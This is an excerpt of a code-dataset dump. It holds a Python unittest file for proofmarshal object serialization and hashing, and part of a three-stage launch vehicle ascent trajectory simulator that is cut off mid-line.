pass\n","sub_path":"bfg9000/builtins/link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":20824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"42578768","text":"# Copyright (C) 2014 Peter Todd \n#\n# This file is part of python-smartcolors.\n#\n# It is subject to the license terms in the LICENSE file found in the top-level\n# directory of this distribution.\n#\n# No part of python-smartcolors, including this file, may be copied, modified,\n# propagated, or distributed except according to the terms contained in the\n# LICENSE file.\n\nimport io\nimport unittest\nimport uuid\n\nfrom proofmarshal import *\nfrom proofmarshal.test import load_test_vectors, x, b2x\n\nclass boxed_varuint(ImmutableProof):\n \"\"\"Dummy object with a single varuint in it\"\"\"\n\n HASH_HMAC_KEY = x('dd2617248e435da6db7c119c17cc19cd')\n\n def __init__(self, i):\n object.__setattr__(self, 'i', i)\n\n def _ctx_serialize(self, ctx):\n ctx.write_varuint('i', self.i)\n\n def _ctx_deserialize(self, ctx):\n object.__setattr__(self, 'i', ctx.read_varuint('i'))\n\nclass boxed_bytes(ImmutableProof):\n \"\"\"Dummy object with a single bytes attribute\"\"\"\n\n HASH_HMAC_KEY = x('f690a4d282810e868a0d7d59578a6585')\n EXPECTED_LENGTH = None\n\n def __init__(self, buf):\n object.__setattr__(self, 'buf', buf)\n\n def _ctx_serialize(self, ctx):\n ctx.write_bytes('buf', self.buf, self.EXPECTED_LENGTH)\n\n def _ctx_deserialize(self, ctx):\n object.__setattr__(self, 'buf', ctx.read_bytes('buf', self.EXPECTED_LENGTH))\n\nclass boxed_objs(ImmutableProof):\n \"\"\"Object with other objects\"\"\"\n\n HASH_HMAC_KEY = x('296d566c10ebb4b92e8a7f6e909eb191')\n\n def __init__(self, buf, i):\n object.__setattr__(self, 'buf', boxed_bytes(buf))\n object.__setattr__(self, 'i', boxed_varuint(i))\n\n def _ctx_serialize(self, ctx):\n ctx.write_obj('buf', self.buf)\n ctx.write_obj('i', self.i)\n\n def _ctx_deserialize(self, ctx):\n object.__setattr__(self, 'buf', ctx.read_obj('buf', boxed_bytes))\n object.__setattr__(self, 'i', ctx.read_obj('i', boxed_varuint))\n\nclass Test_BytesSerializationContext(unittest.TestCase):\n def test_varuint(self):\n \"\"\"Test varuints against vectors\"\"\"\n\n for expected_hex_bytes, expected_value in load_test_vectors('valid_varuints.json'):\n expected_bytes = x(expected_hex_bytes)\n\n # serialize\n actual_bytes = boxed_varuint(expected_value).serialize()\n self.assertEqual(b2x(expected_bytes), b2x(actual_bytes))\n\n # deserialize\n actual_value = boxed_varuint.deserialize(expected_bytes).i\n self.assertEqual(expected_value, actual_value)\n\n def test_bytes(self):\n \"\"\"Test bytes against vectors\"\"\"\n\n for expected_hex_bytes, expected_hex_value, expected_length in load_test_vectors('valid_bytes.json'):\n expected_bytes = x(expected_hex_bytes)\n expected_value = x(expected_hex_value)\n\n class our_boxed_bytes(boxed_bytes):\n EXPECTED_LENGTH=expected_length\n\n # serialize\n actual_bytes = our_boxed_bytes(expected_value).serialize()\n self.assertEqual(b2x(expected_bytes), b2x(actual_bytes))\n\n # deserialize\n actual_value = our_boxed_bytes.deserialize(expected_bytes).buf\n self.assertEqual(b2x(expected_value), b2x(actual_value))\n\n def test_objs(self):\n \"\"\"Test object serialization\"\"\"\n for expected_hex_serialized_bytes, expected_hex_buf, expected_i, expected_hex_hash \\\n in load_test_vectors('valid_boxed_objs.json'):\n\n expected_serialized_bytes = x(expected_hex_serialized_bytes)\n expected_buf = x(expected_hex_buf)\n\n # serialize\n actual_serialized_bytes = boxed_objs(expected_buf, expected_i).serialize()\n self.assertEqual(b2x(expected_serialized_bytes), b2x(actual_serialized_bytes))\n\n # deserialize\n actual_boxed_obj = boxed_objs.deserialize(expected_serialized_bytes)\n self.assertEqual(b2x(expected_buf), b2x(actual_boxed_obj.buf.buf))\n self.assertEqual(expected_i, actual_boxed_obj.i.i)\n\n # round-trip\n roundtrip_serialized_bytes = actual_boxed_obj.serialize()\n self.assertEqual(b2x(expected_serialized_bytes), b2x(roundtrip_serialized_bytes))\n\nclass Test_JsonSerializationContext(unittest.TestCase):\n def test_varuint(self):\n for expected_value in (0, 1, 2**32):\n actual_value = boxed_varuint.json_deserialize({'i':expected_value}).i\n self.assertEqual(expected_value, actual_value)\n\n actual_json = boxed_varuint(actual_value).json_serialize()\n self.assertEqual({'i':expected_value}, actual_json)\n\n def test_bytes(self):\n for expected_json_value, expected_value in (('', b''), ('deadbeef', b'\\xde\\xad\\xbe\\xef')):\n actual_value = boxed_bytes.json_deserialize({'buf':expected_json_value}).buf\n self.assertEqual(expected_value, actual_value)\n\n actual_json = boxed_bytes(actual_value).json_serialize()\n self.assertEqual({'buf':expected_json_value}, actual_json)\n\nclass Test_HashSerializationContext(unittest.TestCase):\n def test_objs(self):\n \"\"\"Test object hashing\"\"\"\n for expected_hex_serialized_bytes, expected_hex_buf, expected_i, expected_hex_hash \\\n in load_test_vectors('valid_boxed_objs.json'):\n\n expected_buf = x(expected_hex_buf)\n expected_hash = x(expected_hex_hash)\n\n actual_hash = boxed_objs(expected_buf, expected_i).hash\n self.assertEqual(b2x(expected_hash), b2x(actual_hash))\n","sub_path":"test/test_core.py","file_name":"test_core.py","file_ext":"py","file_size_in_byte":5565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"275038080","text":"'''\r\nAuthor: Vishnu Suresh Nair\r\nCode to simulate 3 stage launch vehicle\r\nlv_init.py - loads all initial conditions and prerequisites\r\nmass_optimiser.py - stage optimizer for 3 stage LV\r\ncoe_from_sv.py - state vector to orbital elements conversion\r\n'''\r\n## Ascent Trajectory Design\r\nfrom scipy.optimize import minimize\r\nfrom scipy.interpolate import interp1d\r\nimport numpy as np\r\nfrom numpy import sin, cos, tan, pi, zeros as zr, matrix as mat, arctan as atan, \\\r\n arcsin as asin, arccos as acos, cross, square, shape, ones, append, \\\r\n multiply as mul, dot, arctan2 as atan2, matmul, exp, vstack, \\\r\n cumsum, arange, array, transpose as T, mean\r\nfrom functools import reduce\r\nimport math as math\r\nfrom numpy.linalg import norm, solve, inv\r\nfrom math import log, radians, sqrt, degrees as deg\r\nimport os\r\nfrom bisect import bisect_left\r\nfrom matplotlib import pyplot as plt\r\nimport xlrd\r\nimport xlsxwriter\r\nfrom lv_init_fin import *\r\nfrom coe_from_sv import *\r\nfrom multiprocessing import Pool, cpu_count\r\nimport itertools as it\r\nimport time\r\n\r\nstart_time = time.time()\r\n\r\n##----------------------------- Function Definitions ---------------------------\r\n\r\ndef rocket():\r\n global m_hs, m_init\r\n\r\n Th[x + 1], m[x + 1], mprop[x + 1], g[x + 1], Q[x + 1], D[x + 1], mach[x + 1], a[x + 1], am[x + 1], \\\r\n v[x + 1], vr[x + 1], vm[x + 1], vrm[x + 1], r[x + 1], alt[x + 1], aoa[x + 1], fpa[x + 1], \\\r\n lat_F[x + 1], long_F[x + 1], steerI[x + 1], rateI[x + 1], vAB[x + 1], AziA[x + 1], \\\r\n LB[x + 1], IB[x + 1], IG[x + 1], GA[x + 1], AB[x + 1], GB[x + 1] \\\r\n = lv_calc(mode, deltt, IL, gamma_air, R_air, j2, Re, Rs, mu, alt[x], m_init, \\\r\n mprop_init, flow_con0, mrate, r[x], v[x], vr[x], vAB[x], a[x], fpa[x], area, \\\r\n cd_data, mach_data, alt_data, P_data, T_data, rho_data, steerI[x], LB[x], IB[x], \\\r\n IG[x], GA[x], GB[x], Thrust, rateI[x], lat_F, long_F, Om_p)\r\n\r\n roll = steerI[x][0]\r\n\r\n # Roll Correction \r\n if roll < 0:\r\n steerI[i][0] = roll + min([abs(roll) / 2, 5 * delt]) * delt\r\n elif roll > 0:\r\n steerI[i][0] = roll - min([roll / 2, 5 * delt]) * delt\r\n\r\n if 115 <= alt[x] / 1000 <= 120:\r\n m_init -= m_hs\r\n if m_hs != 0:\r\n '''\r\n print('\\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\\n')\r\n print('\\tPAYLOAD FAIRING SEPERATED')\r\n print('\\tAltitude:', round(alt[x] / 1000, 2), 'kms')\r\n print('\\tTime:', round(tin, 3), 's')\r\n print('\\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\\n')\r\n '''\r\n m_hs = 0\r\n\r\n\r\n# ----------------------------------Table Lookup---------------------------------\r\ndef lookup(x, xs, ys):\r\n if x <= xs[0]: return ys[0]\r\n if x >= xs[-1]: return ys[-1]\r\n\r\n i = bisect_left(xs, x)\r\n k = (x - xs[i - 1]) / (xs[i] - xs[i - 1])\r\n y = k * (ys[i] - ys[i - 1]) + ys[i - 1]\r\n\r\n return y\r\n\r\n\r\n# ---------------------------RungeKutta Integration---------------------------#\r\ndef RK4(dx1, dx2, sep, y):\r\n # This program numericaly solves equations using RK4 iterations\r\n # To be used only for linear functions of time alone\r\n\r\n dx3 = (dx1 + dx2) / 2 # dx value at delt/2\r\n k1 = sep * dx1\r\n k2 = sep * dx3\r\n k3 = k2 # k2=k3 as only time is variable\r\n k4 = sep * dx2\r\n\r\n y += k1 / 6 + k2 / 3 + k3 / 3 + k4 / 6\r\n return y\r\n\r\n\r\n# ----------------------------------Gravity Model-------------------------------#\r\n# As per NASA CR-132689\r\ndef gravity(dist, J2, RE, MU):\r\n [x, y, z] = dist\r\n re = sqrt(x ** 2 + y ** 2 + z ** 2)\r\n R = RE / re\r\n Z = z / re\r\n J = (3 / 2) * J2\r\n\r\n p = 1 + J * (R ** 2) * (1 - 5 * Z ** 2)\r\n\r\n gx = -1 * MU * x * p / (re ** 3)\r\n gy = -1 * MU * y * p / (re ** 3)\r\n gz = -1 * (MU / re ** 3) * (1 + J * R ** 2 * (3 - 5 * Z ** 2)) * z\r\n\r\n g = [gx, gy, gz]\r\n\r\n return g\r\n\r\n\r\n# ------------------------------Co-ordinate Transformations----------------------\r\n# Inertial to Launch Pad frame\r\ndef ILmatrix(lat_L, long_L, AzL):\r\n IL1 = [cos(lat_L) * cos(long_L), cos(lat_L) * sin(long_L), sin(lat_L)]\r\n IL2 = [sin(lat_L) * cos(long_L) * sin(AzL) - cos(AzL) * sin(long_L),\r\n cos(AzL) * cos(long_L) + sin(AzL) * sin(lat_L) * sin(long_L), -sin(AzL) * cos(lat_L)]\r\n IL3 = [-sin(AzL) * sin(long_L) - cos(AzL) * sin(lat_L) * cos(long_L),\r\n sin(AzL) * cos(long_L) - cos(AzL) * sin(lat_L) * sin(long_L), cos(AzL) * cos(lat_L)]\r\n ILmat = [IL1, IL2, IL3]\r\n return array(ILmat)\r\n\r\n\r\n# -----------------Launch Vehicle to body frame transformation-------------------\r\ndef LBmatrix(phi, theta, psi):\r\n LB1 = [cos(psi) * cos(theta), cos(phi) * sin(psi) * cos(theta) + sin(phi) * sin(theta),\r\n sin(phi) * sin(psi) * cos(theta) - cos(phi) * sin(theta)]\r\n LB2 = [-sin(psi), cos(phi) * cos(psi), sin(phi) * cos(psi)]\r\n LB3 = [cos(psi) * sin(theta), cos(phi) * sin(psi) * sin(theta) - sin(phi) * cos(theta),\r\n sin(phi) * sin(psi) * sin(theta) + cos(phi) * cos(theta)]\r\n LBmat = [LB1, LB2, LB3]\r\n return array(LBmat)\r\n\r\n\r\n# ------------Earth Centered Inertial to body frame transformation---------------\r\ndef IBmatrix(LB_in, IL_in):\r\n IBmat = LB_in @ IL_in\r\n return IBmat\r\n\r\n\r\n# ----------------- Inertial to Geographic frame transformation-------------------\r\ndef IGmatrix(phi_c, theta_i):\r\n IGmat = [[-sin(phi_c) * cos(theta_i), -sin(phi_c) * sin(theta_i), cos(phi_c)],\r\n [-sin(theta_i), cos(theta_i), 0],\r\n [-cos(phi_c) * cos(theta_i), -cos(phi_c) * sin(theta_i), -sin(phi_c)]]\r\n\r\n return array(IGmat)\r\n\r\n\r\n# --------------------Geographic to Body frame transformation--------------------\r\ndef GBmatrix(phi_r, theta_r, psi_r):\r\n GBmat = [[cos(theta_r) * cos(psi_r), cos(theta_r) * sin(psi_r), -sin(theta_r)],\r\n [sin(phi_r) * sin(theta_r) * cos(psi_r) - cos(phi_r) * sin(psi_r),\r\n sin(phi_r) * sin(theta_r) * sin(psi_r) + cos(phi_r) * cos(psi_r),\r\n sin(phi_r) * cos(theta_r)],\r\n [cos(phi_r) * sin(theta_r) * cos(psi_r) + sin(phi_r) * sin(psi_r),\r\n cos(phi_r) * sin(theta_r) * sin(psi_r) - sin(phi_r) * cos(psi_r),\r\n cos(phi_r) * cos(theta_r)]]\r\n\r\n return array(GBmat)\r\n\r\n\r\n# ---Geographic to Atmospheric Relative Velocity System (ARVS) transformation----\r\ndef GAmatrix(gamma_a, lambda_a):\r\n GAmat = [[cos(gamma_a) * cos(lambda_a), cos(gamma_a) * sin(lambda_a), -sin(gamma_a)],\r\n [-sin(lambda_a), cos(lambda_a), 0],\r\n [sin(gamma_a) * cos(lambda_a), sin(gamma_a) * sin(lambda_a), cos(gamma_a)]]\r\n\r\n return array(GAmat)\r\n\r\n\r\n# -------------------------ARVS to body transformation---------------------------\r\ndef ABmatrix(al, bet, sig):\r\n ABmat = [[cos(al) * cos(bet), -cos(al) * sin(bet) * cos(sig) + sin(al) * sin(sig),\r\n -cos(al) * sin(bet) * sin(sig) - sin(al) * cos(sig)],\r\n [sin(bet), cos(bet) * cos(sig), cos(bet) * sin(sig)],\r\n [sin(al) * cos(bet), -sin(al) * sin(bet) * cos(sig) - cos(al) * sin(sig),\r\n -sin(al) * sin(bet) * sin(sig) + cos(al) * cos(sig)]]\r\n\r\n return array(ABmat)\r\n\r\n\r\n# -----------------------Inertial to Planet Relative transformation--------------\r\ndef IPmatrix(om, time):\r\n IPmat = [[cos(om * time), sin(om * time), 0],\r\n [-sin(om * time), cos(om * time), 0],\r\n [0, 0, 1]]\r\n\r\n return array(IPmat)\r\n\r\n\r\n# --------------------------------Drag Calculation-------------------------------\r\ndef drag_calc(V, a, rho, area, cd_data, mach_data):\r\n mach = norm(V) / a;\r\n if mach < max(mach_data):\r\n cd = lookup(mach, mach_data, cd_data) # import Cd as function of Mach\r\n else:\r\n cd = 0\r\n # cd = 0.3\r\n Q = 0.5 * rho * (norm(V)) ** 2\r\n drag = array([cd * area * Q, 0, 0])\r\n return drag, Q, mach\r\n\r\n\r\n# --------------Calculate r,v,a,gamma,alpha,phi,theta,psi,mach,D,Q---------------\r\ndef lv_calc(fmode, dt, IL, gamma_amb, R_amb, j2, Re, Rs, mu, alt_i, m0, mprop0, mc, md, rI_i, \\\r\n vI_i, vAI_i, vAB_i, aI_i, fpa_i, area, cd_data, mach_data, alt_data, Pr, Temp, rho, \\\r\n steerI_i, LB_i, IB_i, IG_i, GA_i, GB_i, Th, rate_i, lat_i, long_i, Omp):\r\n # global tin,alt,r,v,vr,vm,vrm\r\n global tin\r\n\r\n # Ambient data\r\n T_amb, rho_amb = lookup(alt_i / 1000, alt_data, Temp), lookup(alt_i / 1000, alt_data, rho)\r\n a_amb = sqrt(gamma_amb * R_amb * T_amb)\r\n\r\n # Mass updation\r\n # deltat = t-t0\r\n mprop_out, m_out = mprop0 - mc - md * (tin - t0), m0 - mc - md * (tin - t0)\r\n\r\n g = array(gravity(rI_i, j2, Re, mu))\r\n Df, Q, mach = drag_calc(vAI_i, a_amb, rho_amb, area, cd_data, mach_data)\r\n Dfm = norm(Df)\r\n\r\n if fmode != 'GT':\r\n # Initiation of Velocities and Attitude angles (co-ordinate frame)\r\n phiI_i, thetaI_i, psiI_i = steerI_i[0], steerI_i[1], steerI_i[2]\r\n rr_i, pr_i, yr_i = rate_i[0], rate_i[1], rate_i[2]\r\n # (Inertial Euler Angles - final states)\r\n rr_f, pr_f, yr_f = rr_i, pr_i, yr_i\r\n phiI_f, thetaI_f, psiI_f = phiI_i + rr_f * dt, thetaI_i + pr_f * dt, psiI_i + yr_f * dt\r\n rate_out = array([rr_f, pr_f, yr_f])\r\n\r\n # Acceleration, Velocity and Position integration\r\n LB_f = LBmatrix(phiI_f, thetaI_f, psiI_f)\r\n IB_f = IBmatrix(LB_f, IL)\r\n Tf = array([Th, 0, 0])\r\n atB = (Tf - Df) / m_out\r\n aI_f = IB_f.T @ atB + g\r\n vI_f = RK4(aI_f, aI_i, dt, vI_i)\r\n rI_f = RK4(vI_f, vI_i, dt, rI_i)\r\n alt_f = norm(rI_f) - Rs\r\n\r\n # Holding criteria\r\n if alt_f < 0.0264:\r\n aI_f, vI_f, rI_f, alt_f = aI_i, vI_i, rI_i, norm(rI_f) - Rs\r\n\r\n vWI = array([0, 0, 0])\r\n vRI = vI_f - v[0]\r\n vAI_out = vRI + vWI\r\n\r\n # uRI = rI_f/norm(rI_f)\r\n # uVI = vI_f/norm(vI_f)\r\n # uVR = vRI/norm(vRI)\r\n # uVA = vAI_out/norm(vAI_out)\r\n # (Latitude and Longitude)\r\n # latc = asin(rI_f[2]/norm(rI_f))\r\n latc = atan2(rI_f[2], sqrt(rI_f[0] ** 2 + rI_f[1] ** 2))\r\n longI = atan2(rI_f[1], rI_f[0])\r\n # longR = longI-Omp[2]*(tin-t0)\r\n # Transformation to Geographic frame\r\n IG_f = IGmatrix(latc, longI)\r\n # vIG = IG_f@vI_f\r\n # vRG = IG_f@vRI\r\n vAG = IG_f @ vAI_out\r\n # (Flight Path Angles)\r\n # gammaI = asin(dot(uRI,uVI))\r\n # gammaR = asin(dot(uRI,uVR))\r\n # gammaA = asin(dot(uRI,uVA))\r\n gammaA = acos(vAG[0] / norm(vAG))\r\n # gammaA = atan2(vAG[2],vAG[0])\r\n # (Azimuth angles)\r\n # AzI = atan(vIG[1]/vIG[0])\r\n # AzR = atan(vRG[1]/vRG[0])\r\n AzA = atan(vAG[1] / vAG[0])\r\n # (Relative roll, pitch and yaw angles)\r\n GA_f = GAmatrix(gammaA, AzA)\r\n GB_f = IG_f.T @ IB_f # For symmetrix matrix, inv(IG) = transpose(IG)\r\n # psiR = atan(GB_f[0,1]/GB_f[0,0])\r\n # thetaR = -asin(GB_f[0,2])\r\n # phiR = atan(GB_f[1,2]/GB_f[2,2])\r\n # Transformation to body frame\r\n vAB_f = IB_f @ vAI_out\r\n # (Aerodynamic Angles)\r\n alpha = atan(vAB_f[2] / vAB_f[0])\r\n beta = atan(vAB_f[1] / sqrt(vAB_f[2] ** 2 + vAB_f[0] ** 2))\r\n sigma = atan((GB_f[1, 2] + sin(beta) * sin(alpha)) \\\r\n / ((GB_f[1, 1] * cos(AzA) - GB_f[1, 0]) * sin(AzA) * cos(gammaA)))\r\n AB_f = ABmatrix(alpha, beta, sigma)\r\n\r\n else:\r\n\r\n vAG = IG_i @ vAI_i\r\n gammaA = acos(vAG[0] / norm(vAG))\r\n AzA = atan(vAG[1] / vAG[0])\r\n GA_f = GAmatrix(gammaA, AzA)\r\n # Initiation of Velocities and Attitude angles (co-ordinate frame)\r\n phiI_i = steerI_i[0]\r\n thetaI_i = steerI_i[1]\r\n psiI_i = steerI_i[2]\r\n # (Inertial Euler Angles during Gravity Turn)\r\n # phiI_f = atan(LB_f[1,2]/LB_f[1,1])\r\n phiI_f = 0\r\n # psiI_f = -asin(LB_f[1,0])\r\n psiI_f = 0\r\n thetaI_f = gammaA - radians(90)\r\n rr_f, pr_f, yr_f = (phiI_f - phiI_i) / dt, (thetaI_f - thetaI_i) / dt, (psiI_f - psiI_i) / dt\r\n rate_out = array([rr_f, pr_f, yr_f])\r\n # Acceleration, Velocity and Position integration\r\n LB_f = LBmatrix(phiI_f, thetaI_f, psiI_f)\r\n IB_f = IBmatrix(LB_f, IL)\r\n Tf = array([Th, 0, 0])\r\n atB = (Tf - Df) / m_out\r\n aI_f = IB_f.T @ atB + g\r\n vI_f = RK4(aI_f, aI_i, dt, vI_i)\r\n rI_f = RK4(vI_f, vI_i, dt, rI_i)\r\n alt_f = norm(rI_f) - Rs\r\n\r\n # Holding criteria\r\n if alt_f < 0.0264:\r\n aI_f, vI_f, rI_f, alt_f = aI_i, vI_i, rI_i, norm(rI_f) - Rs\r\n\r\n vWI = array([0, 0, 0])\r\n vRI = vI_f - v[0]\r\n vAI_out = vRI + vWI\r\n # (Latitude and Longitude)\r\n # latc = asin(rI_f[2]/norm(rI_f))\r\n latc = atan2(rI_f[2], sqrt(rI_f[0] ** 2 + rI_f[1] ** 2))\r\n longI = atan2(rI_f[1], rI_f[0])\r\n # longR = longI-Omp[2]*(tin-t0)\r\n # Transformation to Geographic frame\r\n IG_f = IGmatrix(latc, longI)\r\n GB_f = IG_f.T @ IB_f # For symmetrix matrix, inv(IG) = transpose(IG)\r\n # Transformation to body frame\r\n vAB_f = IB_f @ vAI_out\r\n # (Aerodynamic Angles)\r\n alpha = 0\r\n beta = 0\r\n sigma = 0\r\n AB_f = ABmatrix(alpha, beta, sigma)\r\n\r\n # IP = IPmatrix(Omp[2],t)\r\n Tfm, aIm_f, vIm_f, vAIm_out = norm(Tf), norm(aI_f), norm(vI_f), norm(vAI_out)\r\n steerI_f = [phiI_f, thetaI_f, psiI_f]\r\n\r\n return Tfm, m_out, mprop_out, g, Q, Dfm, mach, aI_f, aIm_f, vI_f, vAI_out, vIm_f, \\\r\n vAIm_out, rI_f, alt_f, alpha, gammaA, latc, longI, steerI_f, rate_out, vAB_f, \\\r\n AzA, LB_f, IB_f, IG_f, GA_f, AB_f, GB_f\r\n\r\n# ----------------------------Rocket Main-------------------------------------\r\ndef rocket_main(*args):\r\n global mode, deltt, x, m_init, mprop_init, flow_con0, mrate, Thrust, tin, t0, \\\r\n tseries, idx, op_log, tags, values\r\n\r\n if len(args) == 0:\r\n pass\r\n\r\n # krate = prate_in[0]\r\n\r\n ind = 0\r\n idn = 0\r\n idx = zr(len(MS) - 1)\r\n Tmax = MS[-1][1]\r\n Tmin = MS[0][1]\r\n tseries = list(arange(Tmin + delt, Tmax + delt, delt))\r\n\r\n y = 0\r\n string0, string = MS[y], MS[y + 1]\r\n\r\n st_n, flag = int(string0[0]), string0[4]\r\n\r\n t0, Thrust0, flow_con0 = float(string0[1]), float(string0[2]), float(string0[3])\r\n t1, Thrust1, flow_con1 = float(string[1]), float(string[2]), float(string[3])\r\n # t,Thrust,flow_con = t1,mean([Thrust0,Thrust1]),mean([flow_con0,flow_con1])\r\n t, Thrust, flow_con = t1, Thrust1, flow_con1\r\n mrate = (flow_con1 - flow_con0) / (t1 - t0)\r\n\r\n m_init = mi[st_n - 1]\r\n mprop_init = mp[st_n - 1]\r\n\r\n for x, tin in enumerate(tseries):\r\n # print(\"Step: \",x)\r\n\r\n if tin < t and not np.isclose(tin, t):\r\n deltt = delt\r\n # print(not tin<=t<=tin+delt)\r\n if kstart <= tin <= kend:\r\n rateI[x] = array([0, krate, 0])\r\n mode = 'BR'\r\n elif gtstart < tin <= gtend:\r\n mode = 'GT'\r\n else:\r\n rateI[x] = array([0, 0, 0])\r\n mode = 'BR'\r\n\r\n rocket()\r\n\r\n elif tin >= t or np.isclose(tin, t):\r\n tseries[x] = t\r\n tin = t\r\n deltt = tseries[x] - tseries[x - 1]\r\n if kstart <= tin <= kend:\r\n rateI[x] = array([0, krate, 0])\r\n mode = 'BR'\r\n elif gtstart < tin <= gtend:\r\n mode = 'GT'\r\n else:\r\n mode = 'BR'\r\n\r\n rocket()\r\n\r\n y += 1\r\n\r\n if mode == 'BR':\r\n event = 'Variable Bodyrate Maneuver'\r\n elif mode == 'GT':\r\n event = 'Gravity Turn'\r\n elif mode == 'CO':\r\n event = 'Separation'\r\n# on_screen_disp(event, st_n, tin, alt[x] / 1000, vm[x], mprop[x], deg(fpa[x]), deg(aoa[x]), deg(steerI[x][1]))\r\n\r\n try:\r\n string0, string = MS[y], MS[y + 1]\r\n st_n, flag = int(string[0]), string[4]\r\n t0, Thrust0, flow_con0 = float(string0[1]), float(string0[2]), float(string0[3])\r\n t1, Thrust1, flow_con1 = float(string[1]), float(string[2]), float(string[3])\r\n # t,Thrust,flow_con = t1,mean([Thrust0,Thrust1]),mean([flow_con0,flow_con1])\r\n t, Thrust, flow_con = t1, Thrust1, flow_con1\r\n mrate = (flow_con1 - flow_con0) / (t1 - t0)\r\n\r\n except:\r\n print('\\n\\n1st Stage Burn Completed!')\r\n\r\n # Stage Initial Conditions\r\n\r\n idx[idn] = x;\r\n\r\n # plot_results(idx[idn-1],idx[idn],[eval(x) for x in pl])\r\n idn += 1\r\n ind += 1\r\n # t_data += time\r\n\r\n print('\\nStage ' + str(st_n) + 'Seperation\\n')\r\n # second and third stage\r\n for _ in range(2):\r\n st_n += 1\r\n thrusts, Isp, sf, p_rate, flow_con0, f_lo, n_seg = Thrust_in[st_n - 1], Sp_imp[st_n - 1], \\\r\n strf[st_n - 1], prate_in[st_n - 1], 0, m_lo[st_n - 1], segn[\r\n st_n - 1]\r\n if m_hs == 0:\r\n m_init = mi[st_n - 1] - m_PLF\r\n print('\\nPayload Fairing mass ' + str(m_PLF) + ' kgs removed \\n')\r\n print('\\nInitial mass ' + str(round(m_init / 1000, 3)) + ' T\\n')\r\n else:\r\n m_init = mi[st_n - 1]\r\n print('\\nInitial mass ' + str(round(m_init / 1000, 3)) + ' T\\n')\r\n\r\n mprop_init = mp[st_n - 1]\r\n Ms = mprop_init - f_lo\r\n Is = Ms * Isp * 9.8055\r\n tslices = zeros(n_seg)\r\n m_rate = zeros(n_seg)\r\n tsl = 0\r\n for l, thrust in enumerate(list(thrusts)):\r\n tsl = tsl + Is / (n_seg * thrust)\r\n tslices[l] = tseries[x] + tsl\r\n m_rate[l] = thrust / (9.8055 * Isp)\r\n tslices = [tseries[x]] + tslices.tolist()\r\n f = 0\r\n for _ in range(500000):\r\n t0 = tseries[x]\r\n x += 1\r\n tseries += [tseries[-1] + delt]\r\n tin = tseries[x]\r\n for f in range(len(tslices) - 1):\r\n tsi = tslices[f]\r\n tsf = tslices[f + 1]\r\n if tsi <= tin < tsf:\r\n prate = p_rate[f]\r\n Thrust = thrusts[f]\r\n mrate = m_rate[f]\r\n rateI[x] = [0, prate, 0]\r\n mode = 'BR'\r\n rocket()\r\n flow_con0 += mrate * delt\r\n\r\n if mode == 'BR':\r\n event = 'Variable Bodyrate Maneuver'\r\n elif mode == 'GT':\r\n event = 'Gravity Turn'\r\n elif mode == 'CO':\r\n event = 'Separation'\r\n\r\n #if round(tseries[x], 2) in np.around(tslices, 2):\r\n #on_screen_disp(event, st_n, tin, alt[x] / 1000, vm[x], mprop[x], deg(fpa[x]), deg(aoa[x]), deg(steerI[x][1]))\r\n if mprop_init - flow_con0 <= f_lo:\r\n print('\\nStage ' + str(st_n) + ' Seperation\\n')\r\n break\r\n\r\n # --------------------------------Orbital Elements---------------------------\r\n O_E = coe_from_sv(r[x], v[x], mu)\r\n Eta = O_E[0]\r\n hm = O_E[1]\r\n ecc = O_E[2]\r\n Om = O_E[3]\r\n inc = O_E[4]\r\n w = O_E[5]\r\n nu = O_E[6]\r\n semimaj = O_E[7]\r\n\r\n apg = semimaj * (1 + ecc) - Re\r\n prg = semimaj * (1 - ecc) - Re\r\n\r\n print('\\n=================================================\\n')\r\n print('\\tOrbit Properties')\r\n print('\\n\\t--------------------\\n')\r\n print('Eccentricity:', round(ecc, 3))\r\n print('Inclination:', round(deg(inc), 3), 'degrees')\r\n print('Apogee:', round(apg / 1000, 3), 'kms')\r\n print('Perigee:', round(prg / 1000, 3), 'kms')\r\n print('Right Ascension of Ascending Node:', round(deg(Om), 3), 'degrees')\r\n print('Argument of Periapsis:', round(deg(w), 3), 'degrees')\r\n print('True Anomaly:', round(deg(nu), 3), 'degrees')\r\n print('Orbital Energy:', round(Eta, 3), 'J/kg')\r\n print('Angular Momentum:', round(hm, 3), 'mps')\r\n print('\\n=================================================\\n')\r\n\r\n return vm[x],alt[x],deg(fpa[x]),\r\n \r\n\r\n################################ Function Definitions End ######################\r\n\r\n# -------------------------Import Stage Data-------------------------------------\r\nwith open(savepath + 'stage_data.txt', 'r') as f:\r\n staging_data = json.load(f)\r\n tags = staging_data[0]\r\n values = np.array(staging_data[1:4]).transpose().tolist()\r\nfor tag, value in zip(tags, values):\r\n locals()[tag] = value\r\n# ------------------------------ Preallocation ----------------------------------\r\nt, m, vm, vrm, Q, mprop, mach, alt, a, v, vr, r, g, steerI, rateI, fpa, lat_F, long_F, aoa, am, Th, \\\r\nD, AziA, vAB, LB, IB, GA, IG, AB, GB, t_data = zr(500000), zr(500000), zr(500000), \\\r\n zr(500000), zr(500000), zr(500000), zr(500000), zr(500000), zr(\r\n [500000, 3]), \\\r\n zr([500000, 3]), zr([500000, 3]), zr([500000, 3]), zr([500000, 3]), zr(\r\n [500000, 3]), \\\r\n zr([500000, 3]), zr(500000), zr(500000), zr(500000), zr(500000), zr(\r\n 500000), zr(500000) \\\r\n , zr(500000), zr(500000), zr([500000, 3]), zr([5000000, 3, 3]), zr([5000000, 3, 3]), \\\r\n zr([5000000, 3, 3]), zr([5000000, 3, 3]), zr([5000000, 3, 3]), zr(\r\n [5000000, 3, 3]), []\r\n\r\n# ------------------------------Initial Conditions-------------------------------\r\nm[0] = mi[0]\r\nmprop[0] = mp[0]\r\nv[0] = vi\r\nvr[0] = [0, 0, 0]\r\nr[0] = ri\r\ng[0] = gravity(ri, j2, Re, mu)\r\na[0] = g[0]\r\nalt[0] = norm(r[0]) - Rs\r\nt[0] = 0\r\nfpa[0] = pi / 2\r\nlat_F[0] = lat_L\r\nlong_F[0] = long_L\r\nm_hs = m_PLF\r\nsteerI[0] = [0, 0, 0]\r\nIL = ILmatrix(lat_L, long_L, AzL)\r\n# delt = 0.01\r\n\r\n# ------------------------------Run Main Program---------------------------------\r\n\r\n#print(\"--- %s seconds ---\" % (time.time() - 